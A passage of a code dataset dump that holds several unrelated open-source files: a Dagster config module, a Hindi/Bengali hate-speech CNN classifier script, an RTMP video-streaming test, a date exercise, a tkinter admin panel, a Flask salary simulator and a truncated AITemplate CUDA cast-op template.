config_value, \"event_log_storage\", defaults[\"event_log_storage\"]\n )\n schedule_storage_data = configurable_class_data_or_default(\n config_value, \"schedule_storage\", defaults[\"schedule_storage\"]\n )\n storage_data = ConfigurableClassData(\n module_name=\"dagster._core.storage.legacy_storage\",\n class_name=\"CompositeStorage\",\n config_yaml=yaml.dump(\n {\n \"run_storage\": {\n \"module_name\": run_storage_data.module_name, # type: ignore # (possible none)\n \"class_name\": run_storage_data.class_name, # type: ignore # (possible none)\n \"config_yaml\": run_storage_data.config_yaml, # type: ignore # (possible none)\n },\n \"event_log_storage\": {\n \"module_name\": event_storage_data.module_name, # type: ignore # (possible none)\n \"class_name\": event_storage_data.class_name, # type: ignore # (possible none)\n \"config_yaml\": event_storage_data.config_yaml, # type: ignore # (possible none)\n },\n \"schedule_storage\": {\n \"module_name\": schedule_storage_data.module_name, # type: ignore # (possible none)\n \"class_name\": schedule_storage_data.class_name, # type: ignore # (possible none)\n \"config_yaml\": schedule_storage_data.config_yaml, # type: ignore # (possible none)\n },\n },\n default_flow_style=False,\n ),\n )\n\n else:\n [\n storage_data,\n run_storage_data,\n event_storage_data,\n schedule_storage_data,\n ] = configurable_storage_data(\n config_value.get(\"storage\"), # type: ignore # (possible none)\n defaults,\n )\n\n scheduler_data = configurable_class_data_or_default(\n config_value, \"scheduler\", defaults[\"scheduler\"]\n )\n\n if config_value.get(\"run_queue\"):\n run_coordinator_data = configurable_class_data(\n {\n \"module\": \"dagster.core.run_coordinator\",\n \"class\": \"QueuedRunCoordinator\",\n \"config\": config_value[\"run_queue\"],\n }\n )\n else:\n run_coordinator_data = configurable_class_data_or_default(\n config_value,\n \"run_coordinator\",\n defaults[\"run_coordinator\"],\n )\n\n run_launcher_data = configurable_class_data_or_default(\n config_value,\n \"run_launcher\",\n defaults[\"run_launcher\"],\n )\n\n secrets_loader_data = configurable_secrets_loader_data(\n config_value.get(\"secrets\"), # type: ignore # (possible none)\n defaults[\"secrets\"],\n )\n\n settings_keys = {\n \"telemetry\",\n \"python_logs\",\n \"run_monitoring\",\n \"run_retries\",\n \"code_servers\",\n \"retention\",\n \"sensors\",\n \"schedules\",\n \"nux\",\n \"auto_materialize\",\n }\n settings = {key: config_value.get(key) for key in settings_keys if config_value.get(key)}\n\n return InstanceRef(\n local_artifact_storage_data=local_artifact_storage_data, # type: ignore # (possible none)\n run_storage_data=run_storage_data,\n event_storage_data=event_storage_data,\n compute_logs_data=compute_logs_data, # type: ignore # (possible none)\n schedule_storage_data=schedule_storage_data,\n scheduler_data=scheduler_data,\n run_coordinator_data=run_coordinator_data,\n run_launcher_data=run_launcher_data,\n settings=settings,\n custom_instance_class_data=custom_instance_class_data,\n storage_data=storage_data,\n secrets_loader_data=secrets_loader_data,\n )\n\n @staticmethod\n def from_dict(instance_ref_dict):\n def value_for_ref_item(k, v):\n if v is None:\n return None\n if k == \"settings\":\n return v\n return ConfigurableClassData(*v)\n\n return InstanceRef(**{k: value_for_ref_item(k, v) for k, v in instance_ref_dict.items()})\n\n @property\n def local_artifact_storage(self) -> \"LocalArtifactStorage\":\n from dagster._core.storage.root import LocalArtifactStorage\n\n return self.local_artifact_storage_data.rehydrate(as_type=LocalArtifactStorage)\n\n @property\n def storage(self) -> Optional[\"DagsterStorage\"]:\n from dagster._core.storage.base_storage import DagsterStorage\n\n return self.storage_data.rehydrate(as_type=DagsterStorage) if self.storage_data else None\n\n @property\n def run_storage(self) -> Optional[\"RunStorage\"]:\n from dagster._core.storage.runs.base import RunStorage\n\n return (\n self.run_storage_data.rehydrate(as_type=RunStorage) if self.run_storage_data else None\n )\n\n @property\n def event_storage(self) -> Optional[\"EventLogStorage\"]:\n from dagster._core.storage.event_log.base import EventLogStorage\n\n return (\n self.event_storage_data.rehydrate(as_type=EventLogStorage)\n if self.event_storage_data\n else None\n )\n\n @property\n def schedule_storage(self) -> Optional[\"ScheduleStorage\"]:\n from dagster._core.storage.schedules.base import ScheduleStorage\n\n return (\n self.schedule_storage_data.rehydrate(as_type=ScheduleStorage)\n if self.schedule_storage_data\n else None\n )\n\n @property\n def compute_log_manager(self) -> \"ComputeLogManager\":\n from dagster._core.storage.compute_log_manager import ComputeLogManager\n\n return self.compute_logs_data.rehydrate(as_type=ComputeLogManager)\n\n @property\n def scheduler(self) -> Optional[\"Scheduler\"]:\n from dagster._core.scheduler.scheduler import Scheduler\n\n return self.scheduler_data.rehydrate(as_type=Scheduler) if self.scheduler_data else None\n\n @property\n def run_coordinator(self) -> Optional[\"RunCoordinator\"]:\n from dagster._core.run_coordinator.base import RunCoordinator\n\n return (\n self.run_coordinator_data.rehydrate(as_type=RunCoordinator)\n if self.run_coordinator_data\n else None\n )\n\n @property\n def run_launcher(self) -> Optional[\"RunLauncher\"]:\n from dagster._core.launcher.base import RunLauncher\n\n return (\n self.run_launcher_data.rehydrate(as_type=RunLauncher)\n if self.run_launcher_data\n else None\n )\n\n @property\n def secrets_loader(self) -> Optional[\"SecretsLoader\"]:\n from dagster._core.secrets.loader import SecretsLoader\n\n # Defining a default here rather than in stored config to avoid\n # back-compat issues when loading the config on older versions where\n # EnvFileLoader was not defined\n return (\n self.secrets_loader_data.rehydrate(as_type=SecretsLoader)\n if self.secrets_loader_data\n else None\n )\n\n @property\n def custom_instance_class(self) -> Type[\"DagsterInstance\"]:\n return ( # type: ignore # (ambiguous return type)\n class_from_code_pointer(\n self.custom_instance_class_data.module_name,\n self.custom_instance_class_data.class_name,\n )\n if self.custom_instance_class_data\n else None\n )\n\n @property\n def custom_instance_class_config(self) -> Mapping[str, Any]:\n return (\n self.custom_instance_class_data.config_dict if self.custom_instance_class_data else {}\n )\n\n def to_dict(self) -> Mapping[str, Any]:\n return self._asdict()\n","repo_name":"dagster-io/dagster","sub_path":"python_modules/dagster/dagster/_core/instance/ref.py","file_name":"ref.py","file_ext":"py","file_size_in_byte":24114,"program_lang":"python","lang":"en","doc_type":"code","stars":8986,"dataset":"github-code","pt":"53"} +{"seq_id":"17329056646","text":"#!pip install torchtext==0.4.0\n\nimport torch\nimport torch.autograd as autograd\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nimport torch.nn as nn\nimport torchtext.vocab as vocab\nfrom DataPreprocess import *\nfrom TrainEvalLoops import *\nfrom model import *\n\nchoice = input(\"Type 'h' to run model for Hindi and 'b' for Bengali:\\n\")\nif choice == 'h':\n print(f'You entered {choice}, running sentiment analysis for Hindi.')\n\n #HINDI\n url = 'Data/hindi_hatespeech.tsv'\n df = pd.read_csv(url, sep='\\t')\n #clean data\n df['text'] = clean_data(df['text'])\n df['text'] = remove_hindi_stopwords(df['text'])\n df = hindi_drop_columns(df) #dropping columns we don't need \n #load our custom embeddings into vocab vector\n #custom_embeddings = vocab.Vectors(name = 'HindiEmbeddings.txt') #basic skipgram embeddings\n custom_embeddings = vocab.Vectors(name = 'Data/HindiEmbeddingsUpdated.txt') #sgns embeddings\n\nif choice == 'b':\n print(f'You entered {choice}, running sentiment analysis for Bengali.')\n\n #BENGALI\n url = 'Data/bengali_hatespeech.csv'\n df = pd.read_csv(url,header = None)\n df = reduce_bengali(df)\n #clean data\n df[0] = clean_data(df[0])\n df[0] = remove_bengali_stopwords(df[0])\n df = bengali_drop_columns(df) #dropping columns we don't need \n #load our custom embeddings into vocab vector\n #custom_embeddings = vocab.Vectors(name = 'Data/BengaliEmb.txt') #basic skipgram embeddings\n custom_embeddings = vocab.Vectors(name = 'Data/BengaliEmbeddingsUpdated.txt') #sgns embeddings\n\nTEXT = data.Field(sequential=True, batch_first=True)\nLABEL = data.LabelField(dtype=torch.float)\n\ndf.columns = ['text','label'] \nfields = { 'text' : TEXT, 'label':LABEL }\ntrain_ds = DataFrameDataset(df, fields) #convert pandas df to torchtext df\n\nTEXT.build_vocab(train_ds, vectors = custom_embeddings)\nLABEL.build_vocab(train_ds)\n#store our pretrained word embeddings in this variable to pass to our network\npretrained = TEXT.vocab.vectors\n\n#make test and train splits\nSEED = 32\ntrain_size = int(0.75*len(train_ds)) #use 75% for training and rest for testing\nval_size = len(train_ds)-train_size\ntrain_dataset,val_dataset = train_ds.split([train_size,val_size], random_state = random.seed(SEED))\n\n#define hyperparamters\nINPUT_DIM = len(TEXT.vocab)\nEMBEDDING_DIM = 300\nN_FILTERS = 200\nFILTER_SIZES = [2,3,4,5]\nOUTPUT_DIM = 1\nDROPOUT = 0.5\nPAD_IDX = TEXT.vocab.stoi[TEXT.pad_token]\nBATCH_SIZE = 500\nEPOCHS = 3\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n\n#create our dataloaders\ntrain_iterator, valid_iterator = data.BucketIterator.splits(\n (train_dataset, val_dataset), \n batch_size = BATCH_SIZE,\n sort_within_batch = False,\n sort_key = lambda x: len(x.text),\n device = device)\n\n\nmodel = CNN(INPUT_DIM, EMBEDDING_DIM, N_FILTERS, FILTER_SIZES, OUTPUT_DIM, DROPOUT, PAD_IDX)\n\n#ensure embedding in hidden layer for unknown and padding are set to zero\nmodel.embedding.weight.data.copy_(pretrained)\nUNK_IDX = TEXT.vocab.stoi[TEXT.unk_token]\n\nmodel.embedding.weight.data[UNK_IDX] = torch.zeros(EMBEDDING_DIM)\nmodel.embedding.weight.data[PAD_IDX] = torch.zeros(EMBEDDING_DIM)\n\noptimizer = optim.Adam(model.parameters(), lr=5e-3)\n\ncriterion = nn.BCEWithLogitsLoss()\n\nmodel = model.to(device)\n\ncriterion = criterion.to(device)\n\nfor epoch in range(EPOCHS):\n\n train_loss, train_acc = train(model, train_iterator, optimizer, criterion)\n \n print(f'Epoch: {epoch+1:02}')\n print(f'\\tTrain Loss: {train_loss:.3f} | Train Acc: {train_acc*100:.2f}%')\n\n\n\ntest_loss, test_acc = evaluate(model, valid_iterator, criterion)\n\nprint(f'Test Loss: {test_loss:.3f} | Test Acc: {test_acc*100:.2f}%')\n","repo_name":"kushagra801/NLPproject-HateSpeechClassification","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3706,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17432059494","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\n测试rtmp推流\n\n用法:\n\n\n\"\"\"\n\nimport argparse\nimport time\n\nimport cv2\nimport queue\nfrom threading import Thread\nimport datetime, _thread\nimport imutils\nimport subprocess\n\n\nimport tensorflow as tf\nimport keras\nfrom flask import Flask, render_template, Response, request\nfrom imutils.video import WebcamVideoStream\nfrom keras.models import load_model\nfrom A_Final_Sys.oldcare.facial import FaceUtil\nfrom A_Final_Sys.oldcare.camera import VideoCamera\nfrom A_Final_Sys.oldcare.utils import Time_Controller\nfrom A_Final_Sys.oldcare.utils import Fence_Tools\nfrom A_Final_Sys.oldcare.utils import getIP\nfrom flask_cors import *\nfrom A_Final_Sys.oldcare.utils import fileassistant\nimport keras.backend.tensorflow_backend as K\nimport subprocess as sp\n\n\nVIDEO_WIDTH = 640\nVIDEO_HEIGHT = 480\nANGLE = 20\n# 全��常量\n\nlimit_time = 2\n# 使用线程锁,防止线程死锁\nmutex = _thread.allocate_lock()\n# 存图片的队列\nframe_queue = queue.Queue()\n\nrtmpUrl = \"rtmp://localhost:1935/rtmplive\"\n\ncommand = ['ffmpeg',\n '-y',\n '-f', 'rawvideo',\n '-vcodec', 'rawvideo',\n '-pix_fmt', 'bgr24',\n '-s', \"{}x{}\".format(640, 480), # 图片分辨率\n '-r', str(10.0), # 视频帧率\n '-i', '-',\n '-c:v', 'libx264',\n '-pix_fmt', 'yuv420p',\n '-preset', 'ultrafast',\n '-f', 'flv',\n rtmpUrl]\n\n\n\ndef Video():\n # 调用相机拍图的函数\n vid = cv2.VideoCapture(0)\n time.sleep(2);\n if not vid.isOpened():\n raise IOError(\"Couldn't open webcam or video\")\n\n while (vid.isOpened()):\n return_value, frame = vid.read()\n # 原始图片推入队列中\n frame_queue.put(frame)\n frame_queue.get() if frame_queue.qsize() > 1 else time.sleep(0.01)\n\n\n\ndef push_frame():\n # 推流函数\n accum_time = 0\n curr_fps = 0\n fps = \"FPS: ??\"\n # prev_time = time()\n # 防止多线程时 command 未被设置\n while True:\n print('command lenth', len(command))\n if len(command) > 0:\n # 管道配置,其中用到管道\n p = sp.Popen(command, stdin=sp.PIPE)\n break\n\n while True:\n if frame_queue.empty() != True:\n counter = 0\n\n while True:\n counter += 1\n image = frame_queue.get()\n if counter%2 != 0: # 放弃前10帧\n continue\n image = cv2.flip(image, 1) #镜像翻转\n image = cv2.resize(image, (640, 480)) #压缩\n p.stdin.write(image.tostring())\n print(counter)\n\n\n\n\ndef run():\n # 使用两个线程处理\n thread1 = Thread(target=Video, )\n thread1.start()\n time.sleep(2)\n thread2 = Thread(target=push_frame, )\n thread2.start()\n cv2.destroyAllWindows()\n\n\nif __name__ == '__main__':\n run()\n\n\n\n\n\n","repo_name":"huijieXue1020/CVpart","sub_path":"rtmptest.py","file_name":"rtmptest.py","file_ext":"py","file_size_in_byte":2906,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4192361006","text":"\"\"\"\n\nThe datetime module provides data and time objects and a rich set of methods and operators. Read the documentation [here](https://docs.python.org/2/library/datetime.html). Submit the following in a file named `date.py`.\n\n1. Use the datetime module to write a program that gets the current date and prints the day of the week.\n2. Write a program that takes a birthday as input and prints the user’s age and the number of days, hours, minutes and seconds until their next birthday.\n3. For two people born on different days, there is a day when one is twice as old as the other. That’s their Double Day. Write a program that takes two birthdays and computes their Double Day.\n4. For a little more challenge, write the more general version that computes the day when one person is n times older than the other.\n\n\"\"\"\n\nimport time\n\nfrom datetime import date\nfrom datetime import datetime\n\ndef next_bday(year,month,day):\n\t\n\ttoday = datetime.now()\n\n\tmy_bday = datetime(today.year , month , day)\n\n\ttime_to_bday = ( today - my_bday)\n\n\tage = today.year - year\n\n\tprint(\"Age of person : \", age)\n\t\t\n\tprint(\"Days to birthday :\", abs(time_to_bday.days))\n\n\tprint(\"Hours to birthday :\", time_to_bday.seconds // 3600 )\n\n\tprint(\"Minutes to birthday :\", time_to_bday.seconds % 3600 // 60 )\n\n\tprint(\"seconds to birthday :\", time_to_bday.seconds % 3600 )\n\ntoday = date.today()\n\nprint(\"Current day and date ::\", today.strftime(\"%A\"),today)\n\nnext_bday(1992,12,14)\n\n\n\n\n\n\n\n\n","repo_name":"Ananth-Adhikarla/Python-Programming","sub_path":"date.py","file_name":"date.py","file_ext":"py","file_size_in_byte":1456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23961404928","text":"import os\t\t # these lines are imported libraries needed for the GUI\r\nfrom tkinter import *\r\nimport tkinter.messagebox as tm\r\nimport datetime\r\nimport tkinter as tk\r\nimport shutil\r\n\r\ndef developer(self, root, LoginFrame, username, password):\r\n def dest():\t\t\t # this function is destroying the widgets on the page for when the page is changed\r\n self.userBanner.destroy()\r\n self.filesBanner.destroy()\r\n self.infoBanner.destroy()\r\n self.spacer.destroy()\r\n self.userScroll.destroy()\r\n self.userBox.destroy()\r\n self.fileScroll.destroy()\r\n self.fileBox.destroy()\r\n self.delUserBut.destroy()\r\n self.delFileBut.destroy()\r\n self.devUserBut.destroy()\r\n self.DELUSER_ent.destroy()\r\n self.DELFILE_ent.destroy()\r\n self.DEVUSER_ent.destroy()\r\n self.lab6.destroy()\r\n def ret(event):\t # this function is calling the dest function and and then loading the function main menu onto the page\r\n dest()\r\n from mainMENU import main_menu\r\n main_menu(self, root, LoginFrame, username, password)\r\n def DevopFunc(event):\r\n try:\r\n devUser = self.DEVUSER_ent.get()\r\n path, pathx = os.getcwd().split(\"\\\\\"), \"\" # these lines find the files opened and created later in the function\r\n for i in path: pathx = pathx + i + \"\\\\\"\r\n pathy = pathx + \"\\\\userInfo\\\\\" + devUser\r\n pathz = pathy + (\"\\\\\" + devUser + \"Info.txt\")\r\n file, lines = open(pathz, \"r\"), []\r\n for line in file: # these lines find the admin data in the user text file\r\n if \"admin: \" in line: lines.append(\"admin: True\\n\")\r\n else: lines.append(line)\r\n file.close()\r\n file = open(pathz, \"w\") # these lines overwrite the file\r\n for i in lines: file.write(i)\r\n file.close()\r\n messagebox.showinfo(\"Success\", \"the user was made a developer\") # this shows a success message\r\n except: tm.showerror(\"Error\", \"That user does not exist\") # this error message is shown if the user does not exist\r\n\r\n def DelUserFunc(event):\r\n MsgBox = messagebox.askquestion('Delete Account','Are you sure you want delete this user?',icon = 'warning')\r\n if MsgBox == 'yes':\r\n try:\r\n delUser = self.DELUSER_ent.get()\r\n if delUser == \"\": tm.showerror(\"Error\", \"That user does not exist\")\r\n else:\r\n path, pathx, lines = os.getcwd().split(\"\\\\\"), \"\", [] # these lines find text files and put them in a string\r\n for i in path: pathx = pathx + i + \"\\\\\"\r\n pathy = pathx + \"\\\\GUIdata\\\\logins.txt\"\r\n pathx = pathx + \"\\\\userInfo\\\\\" + delUser\r\n shutil.rmtree(pathx)\r\n file, skip = open(pathy, \"r\"), False\r\n for line in file: # these lines find the login info\r\n if delUser in line and skip == False: skip = True\r\n elif skip == True: skip = False\r\n else: lines.append(line)\r\n file.close()\r\n file = open(pathy, \"w\")\r\n for x in lines: file.write(x) # this line re-writes the file, deleting the users info\r\n file.close()\r\n#-----------------------------------------------------------\r\n path.pop()\r\n patha = \"\"\r\n for i in path: patha = patha + i + \"\\\\\"\r\n pathb = patha + \"\\\\crypto_modules\\\\data\\\\queue.txt\"\r\n pathc = patha + \"\\\\crypto_modules\\\\data\\\\objects.txt\" # find the file paths\r\n rewrite, trigger = [], False\r\n file = open(pathb, \"w\") # clear the queue\r\n file.close()\r\n file = open(pathc, \"r\")\r\n for line in file: # remove users objects\r\n if trigger == False:\r\n if delUser in line: trigger = True\r\n else: rewrite.append(line)\r\n else: trigger = False\r\n file.close()\r\n file = open(pathc, \"w\")\r\n for line in rewrite:\r\n file.write(line)\r\n file.close()\r\n#-----------------------------------------------------------\r\n messagebox.showinfo(\"Success\", \"the user was deleted\")\r\n except: tm.showerror(\"Error\", \"That user does not exist\")\r\n\r\n def DelUserFile(event):\r\n fileToDel = self.DELFILE_ent.get()\r\n if fileToDel != \"\":\r\n path, pathx, found = os.getcwd().split(\"\\\\\"), \"\", False # these lines find the file and put the data into variable info\r\n directories, allUserFiles = [], \"\"\r\n for i in path: pathx = pathx + i + \"\\\\\"\r\n pathy = pathx + \"\\\\userInfo\"\r\n direcTwo = os.listdir(pathy)\r\n for i in direcTwo: directories.append(pathy + \"\\\\\" + i) # these lines find all the current user files\r\n for i in directories:\r\n currentDIR = os.listdir(i)\r\n for x in currentDIR:\r\n try:\r\n FTD = i + \"\\\\\" + fileToDel\r\n os.remove(FTD) # this line removes the file\r\n messagebox.showinfo(\"Success\", \"the file was deleted\") # this line shows the success message\r\n found = True\r\n except: expen = \"\" # this line is a filler\r\n if found == False: tm.showerror(\"Error\", \"That file does not exist\") # if the file is not found then this error message shows\r\n \r\n \r\n\r\n#===================================================================================================================\r\n path, pathx = os.getcwd().split(\"\\\\\"), \"\" # these lines find the file and put the data into variable info\r\n for i in path: pathx = pathx + i + \"\\\\\"\r\n pathy = pathx + \"\\\\GUIdata\\\\GUI_options.txt\" # these lines find the colour and font in the GUI_options file\r\n file = open(pathy, \"r\")\r\n for line in file:\r\n if \"background: \" in line: colour = line[12:-1]\r\n if \"font: \" in line: font = line[6:-1]\r\n file.close()\r\n#===================================================================================================================\r\n path, pathx, users = os.getcwd().split(\"\\\\\"), \"\", \"\" # these lines find the file and put the data into variable info\r\n for i in path: pathx = pathx + i + \"\\\\\"\r\n pathy = pathx + \"\\\\userInfo\" # these lines find the users in the directory\r\n direc = os.listdir(pathy)\r\n for file in direc: users = users + file + \"\\n\"\r\n \r\n#===================================================================================================================\r\n path, pathx = os.getcwd().split(\"\\\\\"), \"\" # these lines find the file and put the data into variable info\r\n directories, allUserFiles = [], \"\"\r\n for i in path: pathx = pathx + i + \"\\\\\"\r\n pathy = pathx + \"\\\\userInfo\"\r\n direcTwo = os.listdir(pathy)\r\n for i in direcTwo: directories.append(pathy + \"\\\\\" + i) # these lines find all the current user files\r\n for i in directories:\r\n currentDIR = os.listdir(i)\r\n for x in currentDIR:\r\n allUserFiles = allUserFiles + x + \"\\n\"\r\n#===================================================================================================================\r\n \r\n self.userBanner = Label(self, height=2, width=20, font=(\"Courier\", 15), text=\"all users\", bg=\"#add8e6\") # these lines are creating the 3 top banners\r\n self.filesBanner = Label(self, height=2, width=20, font=(\"Courier\", 15), text=\"user files\", bg=\"#add8e6\")\r\n self.infoBanner = Label(self, height=3, width=35, font=(\"Courier\", 10), text=\"welcome user, you have\\naccess to developer options\", bg=\"#add8e6\")\r\n self.spacer = Label(self, height=1, width=18, bg=colour)\r\n\r\n self.userScroll = Scrollbar(self)\t\t\t\t # these lines are for creating the all user box and user files box with scroll bars\r\n self.userBox = Text(self, yscrollcommand=self.userScroll.set, bg=\"#dee0e2\", font=(\"verdana\", 11), relief=\"sunken\")\r\n self.userBox.config(height=20, width=25)\r\n self.userScroll.config(command=self.userBox.yview)\r\n self.fileScroll = Scrollbar(self)\r\n self.fileBox = Text(self, yscrollcommand=self.fileScroll.set, bg=\"#dee0e2\", font=(\"verdana\", 11), relief=\"sunken\")\r\n self.fileBox.config(height=20, width=25)\r\n self.fileScroll.config(command=self.fileBox.yview)\r\n self.userBox.insert(\"1.0\", users)\r\n self.fileBox.insert(\"1.0\", allUserFiles)\r\n\r\n # these lines create the 3 buttons with user inputs\r\n self.delUserBut = Label(self, height=3, width=35, font=(\"Courier\", 10), text=\"delete a user\", bg=\"#add8e6\")\r\n self.delFileBut = Label(self, height=3, width=35, font=(\"Courier\", 10), text=\"delete a file\", bg=\"#add8e6\")\r\n self.devUserBut = Label(self, height=3, width=35, font=(\"Courier\", 10), text=\"devop a person\", bg=\"#add8e6\")\r\n self.DELUSER_ent = Entry(self, width=60)\r\n self.DELFILE_ent = Entry(self, width=60)\r\n self.DEVUSER_ent = Entry(self, width=60)\r\n\r\n self.spacer.grid(row=0, column=0)\t\t\t\t # these lines are griding the former created widgets and placing them on the screen\r\n self.userBanner.grid(row=0, column=1, padx=10, pady=10)\r\n self.filesBanner.grid(row=0, column=3, padx=10)\r\n self.infoBanner.grid(row=0, column=5, padx=10)\r\n self.userBox.grid(row=1, column=1, rowspan=7)\r\n self.userScroll.grid(row=1, column=2, ipady=150, rowspan=7)\r\n self.fileBox.grid(row=1, column=3, rowspan=7)\r\n self.fileScroll.grid(row=1, column=4, ipady=150, rowspan=7)\r\n self.delUserBut.grid(row=2, column=5)\r\n self.DELUSER_ent.grid(row=3, column=5, padx=10)\r\n self.delFileBut.grid(row=4, column=5)\r\n self.DELFILE_ent.grid(row=5, column=5)\r\n self.devUserBut.grid(row=6, column=5)\r\n self.DEVUSER_ent.grid(row=7, column=5)\r\n \r\n self.lab6 = Label(self, text=\"Return\", bg=\"#a3c7cc\", borderwidth=3, relief=\"groove\") # these lines are creating the return button and placing it\r\n self.lab6.config(font=(\"Courier\", 20), width=35, height=1)\r\n self.lab6.grid(row=8, column=1, columnspan=5, pady= 10)\r\n\r\n self.delFileBut.bind(\"\", DelUserFile)\r\n self.delUserBut.bind(\"\", DelUserFunc)\r\n self.devUserBut.bind(\"\", DevopFunc)\r\n self.lab6.bind(\"\", ret)\t\t\t\t\t\t\t\t# this is binding the return button to the function ret\r\n","repo_name":"Giles-Turnbull/cryptography-automation","sub_path":"cWORKcode/gui/code/developerPage.py","file_name":"developerPage.py","file_ext":"py","file_size_in_byte":11088,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33234090522","text":"import os\nimport env_variables\nfrom flask import render_template, request, url_for, redirect\nfrom salary_simulation_API.models.addapters.adaptador_csv_aliquotas_cumulativas import Adaptador_CSV_Aliquotas_Cumulativas\nfrom salary_simulation_API.models.addapters.adaptador_csv_aliquotas_unicas import Adaptador_CSV_Aliquotas_Unicas\nfrom salary_simulation_API.models.impostos.irpf_clt import IRPF_CLT\nfrom salary_simulation_API.models.impostos.inss import INSS\nfrom salary_simulation_API.models.impostos.irpf_mei import IRPF_MEI\nfrom salary_simulation_API.models.impostos.simples_nacional import Simples_Nacional\nfrom salary_simulation_API.models.modelos.clt.beneficio import Beneficio\nfrom salary_simulation_API.models.modelos.clt.clt import CLT\nfrom salary_simulation_API.models.modelos.pj.mei import MEI\nfrom salary_simulation_API.models.pessoas.pessoa_fisica import Pessoa_Fisica\nfrom salary_simulation_API.models.pessoas.pessoa_juridica import Pessoa_Juridica\n\napp = env_variables.app\n\nadaptador_inss = Adaptador_CSV_Aliquotas_Cumulativas()\nadaptador_inss.set_informacoes(os.path.join(env_variables.DATA_PATH, 'tabela_INSS.csv'))\ninss = INSS(adaptador_inss)\n\nadaptador_ir = Adaptador_CSV_Aliquotas_Unicas()\nadaptador_ir.set_informacoes(os.path.join(env_variables.DATA_PATH, 'tabela_IR.csv'))\nirpf_clt = IRPF_CLT(adaptador_ir)\n\n\nadaptador_ir_mei = Adaptador_CSV_Aliquotas_Unicas()\nadaptador_ir_mei.set_informacoes(os.path.join(env_variables.DATA_PATH, 'tabela_IR.csv'))\nirpf_mei = IRPF_MEI(adaptador_ir)\n\nadaptador_sn = Adaptador_CSV_Aliquotas_Unicas()\nadaptador_sn.set_informacoes(os.path.join(env_variables.DATA_PATH, 'tabela_SimplesNacional.csv'))\nsn = Simples_Nacional(adaptador_sn, is_mei=True)\n\ndict_impostos_pf = {\n 'inss': inss,\n 'ir': irpf_clt\n}\n\ndict_impostos_pj = {\n 'simple_nacional': sn,\n 'ir': irpf_mei\n}\n\npf = None\npj = None\nmei = None\nclt = None\nbeneficios = []\n\n\n@app.route('/')\n@app.route('/home')\ndef home():\n global pf\n global pj\n global mei\n global clt\n global beneficios\n\n pf = None\n pj = None\n mei = None\n clt = None\n beneficios = []\n\n return render_template('home.html')\n\n\n@app.route('/cadastro', methods=['GET', 'POST'])\ndef cadastro_usuario():\n global pf\n global pj\n\n if request.method == 'GET':\n return render_template('forms/cadastro_form.html')\n else:\n nome = request.form['inputNome']\n id_number = request.form['inputId']\n qtd_dependentes = int(request.form['inputDependentes'])\n\n if request.form['inputModalidadeContrato'] == 'CLT':\n print('CLT')\n pf = Pessoa_Fisica(nome, id_number, qtd_dependentes)\n return redirect(url_for('simular_clt'))\n else:\n print('PJ')\n pj = Pessoa_Juridica(nome, id_number, qtd_dependentes)\n return redirect(url_for('simular_pj'))\n\n\n@app.route('/cadastro/CLT', methods=['GET', 'POST'])\ndef simular_clt():\n global pf\n global clt\n global beneficios\n global dict_impostos_pf\n\n if request.method == 'GET':\n if len(request.args) > 0:\n if all(value != '' for value in request.args.values()):\n nome = request.args['inputBeneficioNome']\n valor = request.args['inputBeneficioValor']\n valor_descontar = request.args['inputBeneficioDesconto']\n frequencia = request.args['inputBeneficioFrequencia']\n\n beneficios.append(Beneficio(nome, valor, valor_descontar, frequencia))\n\n return render_template('forms/clt_form.html', pessoa=pf, contrato=clt, beneficios=beneficios)\n else:\n salario_bruto = request.form['inputSalario']\n\n clt = CLT(pf, salario_bruto, dict_impostos_pf, lista_beneficios=beneficios)\n clt.calcular_imposto_total()\n return render_template('forms/clt_form.html', pessoa=pf, contrato=clt, beneficios=beneficios)\n\n\n@app.route('/cadastro/PJ', methods=['GET', 'POST'])\ndef simular_pj():\n global pj\n global mei\n global dict_impostos_pj\n\n if request.method == 'GET':\n return render_template('forms/pj_form.html', pessoa=pj, contrato=mei)\n else:\n salario_bruto = request.form['inputSalario']\n\n mei = MEI(pj, salario_bruto, dict_impostos_pj, pj.qtd_dependentes)\n mei.calcular_imposto_total()\n return render_template('forms/pj_form.html', pessoa=pj, contrato=mei)\n\n\nif __name__ == '__main__':\n app.run(host=\"0.0.0.0\", port=5000)\n","repo_name":"Diogo364/salary-simulation-API","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":4443,"program_lang":"python","lang":"pt","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"19817594430","text":"from typing import Any, Dict\n\nimport jinja2\n\nfrom aitemplate.backend import registry\nfrom aitemplate.backend.backend_spec import CUDASpec\nfrom aitemplate.backend.common.elementwise_common import gen_int_var_product_str\n\nCUDA_HEADER_FILES = \"\"\"\n#include \n#include \n#include \n\"\"\"\n\nCONSTANT_TEMPLATE = jinja2.Template(\n \"\"\"\n#define N_THREADS_PER_BLOCK 256\n\n \"\"\"\n)\n\nFUNC_DECL_TEMPLATE = jinja2.Template(\n \"\"\"\nvoid invoke_{{func_name}}(\n void* y,\n const void* x,\n {{index_type}} n_elements,\n {{prefix}}Stream_t stream);\n \"\"\"\n)\n\n\nFUNC_CALL_TEMPLATE = jinja2.Template(\n \"\"\"\n{{indent}}{\n {{indent}}const {{index_type}} {{func_name}}_n_elements = {{calculate_n}};\n {{indent}}invoke_{{func_name}}({{output}}, {{input}}, {{func_name}}_n_elements, stream);\n{{indent}}}\n \"\"\"\n)\n\n\nFUNC_TEMPLATE = jinja2.Template(\n \"\"\"\n{{header_files}}\n\nnamespace {\n\n{{constant}}\n\n__global__ void cast_op(\n {{output_type}}* output,\n const {{input_type}}* input,\n {{index_type}} n_elements\n) {\n const {{index_type}} idx = (blockIdx.x * blockDim.x + threadIdx.x);\n if (idx >= n_elements) {\n return;\n }\n output[idx] = {{cast_func_call}}\n }\n\n} // namespace\n\nvoid invoke_{{func_name}}(void* output, const void* input,\n {{index_type}} n_elements, {{prefix}}Stream_t stream) {\n if (n_elements == 0) {\n return;\n }\n int grid_size = static_cast(std::ceil(static_cast(n_elements) / 